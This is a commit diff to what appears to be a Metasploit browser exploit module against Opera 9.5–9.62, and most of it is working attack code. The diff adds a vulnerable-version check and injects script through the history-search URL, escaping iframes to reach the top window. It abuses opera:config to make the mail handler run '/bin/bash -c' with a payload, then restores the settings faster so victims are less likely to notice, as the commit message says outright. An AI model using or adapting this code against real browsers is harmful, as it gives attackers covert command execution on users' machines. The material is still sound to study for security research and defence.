make opera_historysearch work in an iframe and speed it up so it is less likely to tip off a user

git-svn-id: file:///home/svn/framework3/trunk@6915 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2009-07-28 11:08:50 +00:00
parent 9080dd1f0d
commit c29af0197a
1 changed files with 14 additions and 8 deletions


@ -22,7 +22,12 @@ class Metasploit3 < Msf::Exploit::Remote
:ua_name => HttpClients::OPERA, :ua_name => HttpClients::OPERA,
:javascript => true, :javascript => true,
:rank => ExcellentRanking, # reliable command execution :rank => ExcellentRanking, # reliable command execution
:vuln_test => nil, :vuln_test => %Q{
v = parseFloat(opera.version());
if (9.5 < v && 9.62 > v) {
is_vuln = true;
}
},
}) })
def initialize(info = {}) def initialize(info = {})
@ -115,7 +120,6 @@ class Metasploit3 < Msf::Exploit::Remote
s.src="opera:config"; s.src="opera:config";
s.id="config_window"; s.id="config_window";
document.body.appendChild(s); document.body.appendChild(s);
setTimeout(function () {location.href='about:blank'},1000);
config_window.eval( config_window.eval(
"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" + "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
"old_app = opera.getPreference('Mail','External Application');" + "old_app = opera.getPreference('Mail','External Application');" +
@ -124,11 +128,11 @@ class Metasploit3 < Msf::Exploit::Remote
"opera.setPreference('Mail','Handler','2');" + "opera.setPreference('Mail','Handler','2');" +
"app_link = document.createElement('a');" + "app_link = document.createElement('a');" +
"app_link.setAttribute('href', 'mailto:a@b.com');" + "app_link.setAttribute('href', 'mailto:a@b.com');" +
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},500);" +
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},500);" +
"setTimeout(function () {location.href='about:blank'},500);" +
"app_link.click();" + "app_link.click();" +
"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
""); "");
setTimeout(function () {window.location='about:blank'},1);
} }
when /[?]history/ when /[?]history/
@ -148,10 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}") print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")
js = %Q^ js = %Q^
window.onload = function() { var wnd = window;
url = location.href; while (wnd.parent != wnd) {
location.href = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; wnd = wnd.parent;
} }
url = location.href;
wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
^ ^
content = %Q^ content = %Q^
#{html_hdr} #{html_hdr}